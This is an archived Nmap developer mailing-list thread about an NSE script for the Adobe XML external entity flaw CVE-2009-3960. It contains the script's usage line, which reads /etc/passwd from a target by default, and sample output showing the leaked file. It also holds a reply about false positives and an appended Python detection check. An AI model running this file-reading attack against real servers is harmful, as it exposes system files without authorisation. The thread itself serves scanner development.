Nmap Development mailing list archives
Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Patrik Karlsson <patrik () cqure net>
Date: Sun, 1 Jan 2012 21:12:00 +0100
On Sat, Dec 31, 2011 at 3:47 PM, Hani Benhabiles <kroosec () gmail com> wrote:
Hi list,

description = [[
Exploits cve-2009-3960, also known as Adobe XML External Entity Injection.

This vulnerability permits reading local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion
7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile Target file to be read. Defaults to "/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-args http-cve-2009-3960.root="/root/" <target>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-cve-2009-3960:
-- |   samples/messagebroker/http
-- |     <?xml version="1.0" encoding="utf-8"?>
-- |     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string>
-- |     [...]
-- |     root:x:0:0:root:/root:/bin/bash
-- |     bin:*:1:1:bin:/bin:/sbin/nologin
-- |     daemon:*:2:2:daemon:/sbin:/sbin/nologin
-- |     adm:*:3:4:adm:/var/adm:/sbin/nologin
-- |     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
-- |     sync:*:5:0:sync:/sbin:/bin/sync
-- |     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
-- |     halt:*:7:0:halt:/sbin:/sbin/halt
-- |     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
-- |     news:*:9:13:news:/etc/news:
-- |     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
-- |     operator:*:11:0:operator:/root:/sbin/nologin
-- |     games:*:12:100:games:/usr/games:/sbin/nologin
-- |     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
-- |     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
-- |     nobody:*:99:99:Nobody:/:/sbin/nologin
-- |     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
-- |     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
-- |     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
-- |     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
-- |     [...]
-- |_

Cheers,
Hani

--
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Hi Hani,

Thanks for contributing this new script! I've had a quick look at it and see a problem with how it detects whether a server is vulnerable or not. As an example, the current script will detect any server responding to a non-existent page (404) with a 200 OK with a body exceeding 120 characters as vulnerable. I guess the script needs to check for some other characteristics as well.

Unfortunately I don't have access to anything I can test against, but if you have some packet captures I might be able to lend you a hand.

Cheers,
Patrik

--
Patrik Karlsson
http://www.cqure.net
http://twitter.com/nevdull77
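The false-positive Patrik describes (a soft 404 served as 200 OK with a long body) comes from keying the verdict on status code and body length alone. Below is an added example, written for this archive page and not code from the script or from the Nmap project, of the kind of extra response checks the reply asks for: the response has to look like the AMFX AcknowledgeMessage document shown in the script's sample output, and it has to carry lines that parse as passwd(5) entries when the requested file is /etc/passwd. The three sample bodies are constructed for the example, not captures from any host, and the function names (looks_like_amfx_ack, passwd_lines, classify) are assumptions of this example.

```python
import re
from typing import List, Tuple

# Constructed sample responses for illustration; none is a capture from a real host.

# A custom "not found" page returned with HTTP 200: long enough to pass a
# body-length check, but nothing to do with the vulnerable endpoint.
GENERIC_200_BODY = (
    "<html><head><title>Page not found</title></head><body>"
    "<p>Sorry, the page you requested could not be found on this server. "
    "Please check the address you typed or return to the home page.</p>"
    "</body></html>"
)

# Shape of the AMFX acknowledgement shown in the script's sample output.
AMFX_ACK_PREFIX = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    '<object type="flex.messaging.messages.AcknowledgeMessage">'
    '<traits><string>timestamp</string></traits>'
)
AMFX_ACK_SUFFIX = "</object></body></amfx>"

# Endpoint that expanded the external entity and echoed the file contents.
AMFX_WITH_FILE_BODY = (
    AMFX_ACK_PREFIX
    + "<string>\n"
      "root:x:0:0:root:/root:/bin/bash\n"
      "bin:*:1:1:bin:/bin:/sbin/nologin\n"
      "daemon:*:2:2:daemon:/sbin:/sbin/nologin\n"
      "</string>"
    + AMFX_ACK_SUFFIX
)

# Same endpoint type, but no entity expansion (patched, or external entity
# resolution disabled): a plain acknowledgement with no file data.
AMFX_WITHOUT_FILE_BODY = AMFX_ACK_PREFIX + "<string></string>" + AMFX_ACK_SUFFIX

# One passwd(5) entry: name:password:uid:gid:gecos:home:shell, seven
# colon-separated fields with numeric uid and gid, matched per line so
# colon-bearing HTML elsewhere in the body cannot satisfy it.
PASSWD_LINE = re.compile(
    r"^[^:\s]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.MULTILINE
)


def looks_like_amfx_ack(body: str) -> bool:
    """True when the body is an <amfx> document carrying an AcknowledgeMessage,
    which is what the BlazeDS/LiveCycle endpoint returns; a soft 404 is not."""
    return "<amfx" in body and "flex.messaging.messages.AcknowledgeMessage" in body


def passwd_lines(body: str) -> List[str]:
    """Lines of the body that parse as passwd entries."""
    return PASSWD_LINE.findall(body)


def classify(status: int, body: str, min_len: int = 120) -> Tuple[bool, str]:
    """Decide whether a response demonstrates file disclosure.

    The first two checks are the ones the posted script already makes; the
    remaining two are the "other characteristics" that rule out generic
    200 OK pages and acknowledgements that contain no file data.
    """
    if status != 200:
        return False, "HTTP %d" % status
    if len(body) <= min_len:
        return False, "body too short"
    if not looks_like_amfx_ack(body):
        return False, "200 OK but not an AMFX acknowledgement (likely a soft 404)"
    lines = passwd_lines(body)
    if not lines:
        return False, "AMFX acknowledgement without file contents"
    return True, "AMFX acknowledgement carrying %d passwd-style lines" % len(lines)


if __name__ == "__main__":
    for label, status, body in (
        ("soft 404 as 200 OK", 200, GENERIC_200_BODY),
        ("AMFX ack, no file", 200, AMFX_WITHOUT_FILE_BODY),
        ("AMFX ack with file", 200, AMFX_WITH_FILE_BODY),
    ):
        vulnerable, reason = classify(status, body)
        print("%-20s vulnerable=%-5s %s" % (label, vulnerable, reason))
```

The passwd-line check is specific to the default readfile argument; for another file the script would need a marker appropriate to that file, or at least the AMFX-structure check plus a non-empty <string> payload, rather than falling back to the length test alone.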